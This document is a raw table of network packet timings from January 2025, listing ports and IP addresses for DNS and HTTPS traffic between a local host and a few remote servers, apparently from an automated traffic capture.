Jan 9, 2025 14:42:34.748297930 CET	65338	53	192.168.2.8	1.1.1.1
Jan 9, 2025 14:42:34.754515886 CET	53	64553	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:34.755022049 CET	53	65338	1.1.1.1	192.168.2.8
Jan 9, 2025 14:42:35.436906099 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.741230011 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.904544115 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.904560089 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.904706001 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.904719114 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.905550957 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.970038891 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.970499039 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.971976042 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.972500086 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.972639084 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.973021030 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.973262072 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.973568916 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.973774910 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.973774910 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.052472115 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.052472115 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.068229914 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.068344116 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.068353891 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.068361998 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.068372965 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.073601961 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.074649096 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.075098038 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.075166941 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.075551987 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.075704098 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.076024055 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.076395035 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.076558113 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.076567888 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.076838017 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.077012062 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.082422018 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.083703995 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.083703995 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.086599112 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.086925030 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.152384996 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.154695988 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.167331934 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.167728901 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.172765970 CET	443	65206	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:36.199333906 CET	65206	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.384465933 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.385507107 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.541354895 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.542946100 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.542959929 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.542972088 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.542984009 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.543445110 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.543613911 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.545489073 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.545618057 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.552086115 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.560549974 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.560594082 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.560707092 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.560718060 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.561904907 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.562503099 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.563193083 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.563271999 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.563391924 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.638907909 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.639440060 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639683962 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639765024 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639775038 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639803886 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.639906883 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.640150070 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.658313990 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658324003 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658333063 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658341885 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658418894 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658751965 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.658751965 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.658829927 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.658840895 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.665386915 CET	62501	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.666344881 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.666354895 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.667284012 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.697083950 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.714406013 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.714418888 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.714432001 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.714443922 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.715075970 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.715075970 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.717612982 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.717852116 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.719187021 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.722065926 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.724255085 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.725874901 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.728468895 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.729065895 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.729657888 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.732232094 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.734236956 CET	443	62501	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.735338926 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.742218971 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.742239952 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.742253065 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.742264032 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.742489100 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.742547035 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.749690056 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.749702930 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.750427008 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.753621101 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.753675938 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.754688978 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.755055904 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.758191109 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.758388996 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.761502981 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.762945890 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.763320923 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.766721010 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.769016981 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.769248962 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.771660089 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.782726049 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.782738924 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.782751083 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.782757998 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.782883883 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.783324003 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.801717043 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802057028 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802068949 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802079916 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802093029 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802105904 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802119017 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.802139997 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.802268982 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.802268982 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.802521944 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.814467907 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.814481974 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.814498901 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.814511061 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.814522028 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.818500042 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.818500042 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.820913076 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.821211100 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.823143959 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.826616049 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.826915979 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.828469038 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.831757069 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.831998110 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.874377966 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874404907 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874521017 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874557972 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874571085 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874747038 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874758959 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874769926 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874828100 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874839067 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874850035 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.874861002 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875022888 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875061989 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875097036 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875149965 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875161886 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875191927 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875205994 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875217915 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875273943 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875328064 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875396013 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875407934 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875423908 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875436068 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.875543118 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875543118 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875638962 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875662088 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875708103 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875799894 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875931978 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.875931978 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.876025915 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.876040936 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.876118898 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.876171112 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.876878023 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.890193939 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890218019 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890230894 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890245914 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890256882 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890290022 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890357971 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890368938 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890623093 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890645027 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.890752077 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.891201973 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.891201973 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.891334057 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.891402960 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.903677940 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903695107 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903707981 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903728962 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903742075 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903784990 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903798103 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903836012 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903847933 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.903924942 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.904035091 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.904130936 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.904393911 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.904393911 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.917258978 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917288065 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917403936 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917426109 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917474985 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917505026 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917520046 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917552948 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917686939 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917700052 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.917710066 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.933245897 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933366060 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933425903 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933439016 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933449984 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933470011 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933481932 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933533907 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933546066 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933566093 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.933653116 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.938735008 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938777924 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938796997 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938817978 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938832045 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938844919 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938857079 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938874006 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938925028 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.938962936 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.939338923 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:36.939379930 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:36.948132992 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.948163986 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.948177099 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.948189974 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.948201895 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:36.978333950 CET	63936	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.008646965 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.011264086 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.011476040 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.011710882 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.013978004 CET	443	63936	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.042289972 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.042289972 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.043534040 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.045380116 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.045806885 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.046215057 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.046426058 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.047290087 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.062694073 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.063344002 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.070390940 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.071108103 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.102377892 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.102417946 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.102566957 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.102611065 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.104012966 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.104806900 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.104851961 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.105248928 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.202033997 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.202070951 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.202080965 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.202126026 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.202136993 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.202794075 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.203078032 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.203227043 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.205171108 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.246449947 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.300290108 CET	443	62771	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.337640047 CET	62771	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.431621075 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.453442097 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.455018044 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.498893023 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.515769958 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.515784979 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.516499043 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.536825895 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.536839962 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.536849022 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.536859035 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.537132978 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.537365913 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.551148891 CET	443	52165	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:37.587805986 CET	52165	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:37.616832972 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.616854906 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617104053 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617114067 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617155075 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617165089 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617172956 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617182970 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.617206097 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.617309093 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.617309093 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.617435932 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.617435932 CET	49783	443	192.168.2.8	184.51.149.177
Jan 9, 2025 14:42:37.627366066 CET	443	49783	184.51.149.177	192.168.2.8
Jan 9, 2025 14:42:37.627521038 CET	443	49783	184.51.149.177	192.168.2.8
